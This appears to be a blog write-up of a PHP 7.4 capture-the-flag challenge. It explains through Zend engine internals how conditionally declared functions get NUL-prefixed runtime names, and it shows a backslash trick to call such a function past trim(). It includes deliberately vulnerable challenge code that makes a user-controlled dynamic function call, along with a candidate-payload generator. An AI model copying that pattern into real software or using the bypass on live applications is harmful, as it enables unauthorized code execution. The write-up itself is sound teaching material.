This article was published on my blog on October 13th.
A few days ago, I posted a small challenge on the “Code Audit” Knowledge Planet: https://t.zsxq.com/13bFX1N8F
<?php
$password = trim($_REQUEST['password'] ?? '');
$name = trim($_REQUEST['name'] ?? 'viewsource');

function viewsource()
{
    show_source(__FILE__);
}

if (strcmp(hash('sha256', $password), 'ca572756809c324632167240d208681a03b4bd483036581a6190789165e1387a') === 0) {
    function readflag()
    {
        echo 'flag';
    }
}

$name();
?>
The execution environment is PHP 7.4, and the goal is to read the flag.
The code is very simple. I added a few distractions, such as the trim, strcmp, and hash functions, but these distractions are not the core of the challenge. Let's do a simple analysis.
Understanding the PHP script execution process
I am not an expert in C or in PHP internals, so I can only describe how a PHP script is compiled and executed in simple terms.
Like most other scripting languages, PHP execution is divided into two parts:
- Compiling the source code into Zend virtual machine instructions (called oplines in PHP)
- Executing those instructions on the Zend virtual machine
The former is divided into the following steps:
- Call zendparse to perform lexical and syntax analysis and generate the AST
- Call init_op_array and zend_compile_top_stmt to convert the AST into an opline array
- Call pass_two to convert compile-time information into runtime information and set the handler corresponding to each opcode
The latter takes the compiled opline array and executes each opcode in sequence. More precisely, it runs the handler bound to each opcode, which is how the PHP script gets executed. Using the remote ZendVM debugging method I shared on the “Code Audit” planet, we can find the zend_execute_scripts function and see the general logic:
What we want to focus on is the compilation phase. When PHP compiles a function definition, it uses the zend_compile_func_decl function:
void zend_compile_func_decl(znode *result, zend_ast *ast, zend_bool toplevel) /* {{{ */
{
    ...
    zend_ast_decl *decl = (zend_ast_decl *) ast;
    zend_bool is_method = decl->kind == ZEND_AST_METHOD;

    if (is_method) {
        zend_bool has_body = stmt_ast != NULL;
        zend_begin_method_decl(op_array, decl->name, has_body);
    } else {
        zend_begin_func_decl(result, op_array, decl, toplevel);
        if (decl->kind == ZEND_AST_ARROW_FUNC) {
            find_implicit_binds(&info, params_ast, stmt_ast);
            compile_implicit_lexical_binds(&info, result, op_array);
        } else if (uses_ast) {
            zend_compile_closure_binding(result, op_array, uses_ast);
        }
    }
}
As you can see, class methods and ordinary functions are handled in the same function. It has a key parameter called toplevel. As the name suggests, this parameter indicates whether the current function definition is in the top-level scope. Let's follow zend_begin_func_decl, which handles ordinary functions:
static void zend_begin_func_decl(znode *result, zend_op_array *op_array, zend_ast_decl *decl, zend_bool toplevel) /* {{{ */
{
    ...
    zend_register_seen_symbol(lcname, ZEND_SYMBOL_FUNCTION);
    if (toplevel) {
        if (UNEXPECTED(zend_hash_add_ptr(CG(function_table), lcname, op_array) == NULL)) {
            do_bind_function_error(lcname, op_array, 1);
        }
        zend_string_release_ex(lcname, 0);
        return;
    }

    /* Generate RTD keys until we find one that isn't in use yet. */
    key = NULL;
    do {
        zend_tmp_string_release(key);
        key = zend_build_runtime_definition_key(lcname, decl->start_lineno);
    } while (!zend_hash_add_ptr(CG(function_table), key, op_array));
    ...
}
When toplevel is true, the first if branch is taken and the current function name lcname is added directly to the function table. When toplevel is false, execution reaches the do while loop below, which uses zend_build_runtime_definition_key to generate a key and adds that key to the function table as the function name.
In other words, the name PHP registers at compile time differs depending on whether the function is defined in the top-level scope.
We can try the following code under PHP 7.4:
<?php
function func1() {
    echo 'func1';
}

if (true) {
    function func2() {
        echo 'func2';
    }
}
When the first function is compiled, the if (toplevel) branch is taken. At this point, lcname is func1:
When lcname is func2, execution enters the do while loop, where zend_build_runtime_definition_key generates a key that is used as the name of this function:
Let’s press F11 to enter the function and see what the logic is:
It can be seen that the core of this function is a string formatting, and the final key is generated according to the following algorithm:
'\0' + name + filename + ':' + start_lineno + '$' + rtd_key_counter
Apart from the leading \0 character, the four parts have the following meanings:
- name: the function name
- filename: the absolute path of the PHP file
- start_lineno: the line number where the function definition starts (1 is the first line)
- rtd_key_counter: a global counter that starts at 0 and increases by 1 each time this function is executed
So, in my debugging screenshot above, the current value of result->val is \0func2/root/source/php-src/tests/web/ctf3.php:7$0.
In other words, the function name finally stored in the function table is this string starting with \0.
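The key format described above can be sketched in PHP as follows. This is only an illustration, not the engine's code: the helper name build_rtd_key and the path /var/www/html/index.php are hypothetical, and the sketch assumes the counter is a single digit so that its textual form is unambiguous.

```php
<?php
// Hypothetical helper: rebuilds the runtime definition key described above.
// Assumption: $counter is small (0-9), so it is rendered as a single digit.
function build_rtd_key(string $name, string $filename, int $startLineno, int $counter): string
{
    // lcname is the lowercased function name, so lowercase it here as well.
    return "\0" . strtolower($name) . $filename . ':' . $startLineno . '$' . $counter;
}

// Illustrative values only: the path and line number are made up.
$key = build_rtd_key('func2', '/var/www/html/index.php', 7, 0);

// Print the key with the NUL byte made visible.
echo str_replace("\0", '\0', $key), PHP_EOL; // \0func2/var/www/html/index.php:7$0
```

The real path, line number, and counter have to match the target environment exactly, otherwise the lookup in the function table fails.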
Opline differences caused by the scope of the function
In the previous section, we used debugging to briefly analyze the compilation logic for a function in a non-top-level scope. While reading zend_begin_func_decl above, I also noticed that when toplevel is false, PHP calls get_next_op() to generate a new opline, but it does not do so when toplevel is true.
Let’s take a look at the differences between the two in opline.
Using the vld extension, we can view oplines of PHP code. Let’s first take a look at the oplines of the following code:
<?php
function func1() {
    echo 'func1';
}
func1();
As you can see, there is no opcode for the function definition here. The two opcodes starting at line 5 are INIT_FCALL and DO_FCALL, which perform the function call.
Now take a look at the oplines of the following code:
<?php
if (true) {
    function func2() {
        echo 'func2';
    }
}
func2();
Two differences are obvious:
- There is an additional opcode, DECLARE_FUNCTION, which defines the function
- The INIT_FCALL used to call the function becomes INIT_FCALL_BY_NAME
When PHP compiles a function in a non-top-level scope, the original function name and the generated key are stored, in that order, in the attributes of the DECLARE_FUNCTION opline. Only when the DECLARE_FUNCTION opcode is executed is the real, original function name put into the function table.
In other words, for a function that is not in the top-level scope, a name starting with \0 is first placed in the function table during the compilation phase. Then, during the execution phase, the DECLARE_FUNCTION handler puts the real function name into the function table.
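The visible effect of this difference can be checked from PHP itself. The following is a small sketch with made-up function names: it records whether each function is callable by its real name before and after the conditional block has run.

```php
<?php
$seen = [];

// Top-level function: already in the function table before any opcode runs,
// even though its definition appears further down in the file.
$seen[] = function_exists('top_level_func');

// Conditional function: its DECLARE_FUNCTION opcode has not been executed yet,
// so the real name is not registered.
$seen[] = function_exists('conditional_func');

if (true) {
    function conditional_func() { return 'conditional'; }
}

// After the branch has run, the real name is in the function table.
$seen[] = function_exists('conditional_func');

function top_level_func() { return 'top'; }

var_dump($seen); // true, false, true
```

If the condition were false, the third check would stay false as well, which is exactly the situation in the challenge.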
So, back to the challenge at the beginning of this article: because we cannot satisfy the strcmp comparison in the if statement, we never enter the if block and DECLARE_FUNCTION is never executed. When $name() runs later, the function cannot be called by its original name readflag. It has to be called by the name starting with \0.
Bypass trim filtering
Following this idea, I calculated the key according to the algorithm of zend_build_runtime_definition_key and sent it as the function name:
The Call to undefined function exception still occurs. Why?
In fact, I left another pitfall: trim. The trim function strips whitespace characters from the beginning and end of the string it receives. The whitespace characters here are the following six, which I introduced in my article “Writeup of several ‘Three White Hats’ competitions in 2016”:
space, \n, \r, \t, \v, \0
In other words, the leading \0 character of the name passed in by the user is stripped by trim, so the function cannot be called.
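The effect of trim on such a key is easy to reproduce. In this short sketch the key is a hypothetical example (the path and line number are made up):

```php
<?php
// Hypothetical key for illustration; the path and line number are made up.
$key = "\0readflag/var/www/html/index.php:11" . '$0';

$trimmed = trim($key);

// trim() strips the leading NUL byte, so the string no longer matches the
// name stored in the function table.
var_dump(strlen($key) - strlen($trimmed)); // int(1)
var_dump($trimmed === substr($key, 1));    // bool(true)
```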
Let’s see how to get around this. First, the opcode used for dynamic function calls is INIT_DYNAMIC_CALL, which we can see using vld. Then we find the corresponding handler in the PHP source code:
static ZEND_OPCODE_HANDLER_RET ZEND_FASTCALL ZEND_INIT_DYNAMIC_CALL_SPEC_CONST_HANDLER(ZEND_OPCODE_HANDLER_ARGS)
{
    USE_OPLINE
    zval *function_name;
    zend_execute_data *call;

    SAVE_OPLINE();
    function_name = RT_CONSTANT(opline, opline->op2);

try_function_name:
    if (IS_CONST != IS_CONST && EXPECTED(Z_TYPE_P(function_name) == IS_STRING)) {
        call = zend_init_dynamic_call_string(Z_STR_P(function_name), opline->extended_value);
    } else if (IS_CONST != IS_CONST && EXPECTED(Z_TYPE_P(function_name) == IS_OBJECT)) {
        call = zend_init_dynamic_call_object(function_name, opline->extended_value);
    } else if (EXPECTED(Z_TYPE_P(function_name) == IS_ARRAY)) {
        call = zend_init_dynamic_call_array(Z_ARRVAL_P(function_name), opline->extended_value);
    }
    ...
}
When the function name is a string, zend_init_dynamic_call_string is executed:
static zend_never_inline zend_execute_data *zend_init_dynamic_call_string(zend_string *function, uint32_t num_args) /* {{{ */
{
    if ((colon = zend_memrchr(ZSTR_VAL(function), ':', ZSTR_LEN(function))) != NULL &&
        colon > ZSTR_VAL(function) &&
        *(colon-1) == ':'
    ) {
        ...
    } else {
        if (ZSTR_VAL(function)[0] == '\\') {
            lcname = zend_string_alloc(ZSTR_LEN(function) - 1, 0);
            zend_str_tolower_copy(ZSTR_VAL(lcname), ZSTR_VAL(function) + 1, ZSTR_LEN(function) - 1);
        } else {
            lcname = zend_string_tolower(function);
        }
        if (UNEXPECTED((func = zend_hash_find(EG(function_table), lcname)) == NULL)) {
            zend_throw_error(NULL, "Call to undefined function %s()", ZSTR_VAL(function));
            zend_string_release_ex(lcname, 0);
            return NULL;
        }
        ...
    }
    ...
}
In the else branch, the first character of the function name is checked. If it is a backslash \, it is removed before the lookup in the function table.
This logic is easy to understand in terms of PHP code: it strips the backslash of the root namespace. All PHP internal functions, and functions declared without a namespace, can be called using \ as the namespace, such as \phpinfo(). The first question of the Code Breaking 2018 challenge hosted by the “Code Audit” Knowledge Planet took advantage of this feature. If you have forgotten it, you can review it here: https://t.zsxq.com/BIuNniY, https://paper.seebug.org/755/.
Therefore, we prepend \ to name and send the request again, and this time we get the flag:
Note, however, that because the file has already been requested once, the trailing rtd_key_counter in the name is now 1, and the value increases by 1 every time this file is accessed.
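Since the counter value may not be known in advance, one option is to prepare several candidate values for the name parameter. The sketch below is only an assumption-laden illustration: candidate_names is a hypothetical helper, the path and line number are made up, and it only covers counters 0 through 9 so that the textual form of the counter is unambiguous.

```php
<?php
// Hypothetical helper: builds URL-encoded candidates for the `name` parameter,
// one per counter value. Only counters 0-9 are covered (assumption: a single
// digit is rendered the same way regardless of number formatting).
function candidate_names(string $func, string $file, int $line, int $maxCounter): array
{
    $candidates = [];
    foreach (range(0, min($maxCounter, 9)) as $counter) {
        $key = "\0" . strtolower($func) . $file . ':' . $line . '$' . $counter;
        // The leading backslash survives trim() and is stripped by the engine.
        $candidates[] = rawurlencode('\\' . $key);
    }
    return $candidates;
}

// Illustrative values only: adjust the path and line number to the target.
$names = candidate_names('readflag', '/var/www/html/index.php', 11, 2);
foreach ($names as $name) {
    echo 'name=', $name, PHP_EOL;
}
```

Each request to the file may itself advance the counter, so the candidates would need to be tried with that in mind.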
Changes in PHP 8.1
For this challenge, I fixed the execution environment at PHP 7.4. The reason is that in PHP 8.1 and later, the use of temporary function names during compilation has been removed.
The PR for this change is https://github.com/php/php-src/pull/5595. The reason the PHP developers removed this feature has nothing to do with this article: the memory occupied by these temporary functions is not released in some cases, which causes memory leaks.
The logic that generates temporary function names has been removed directly from zend_begin_func_decl:
However, the zend_build_runtime_definition_key function itself has not been removed. It is still called to generate a temporary class name when a class is defined outside the top-level scope. That is a separate topic that this article will not cover, but with some tinkering you could come up with a similar CTF challenge.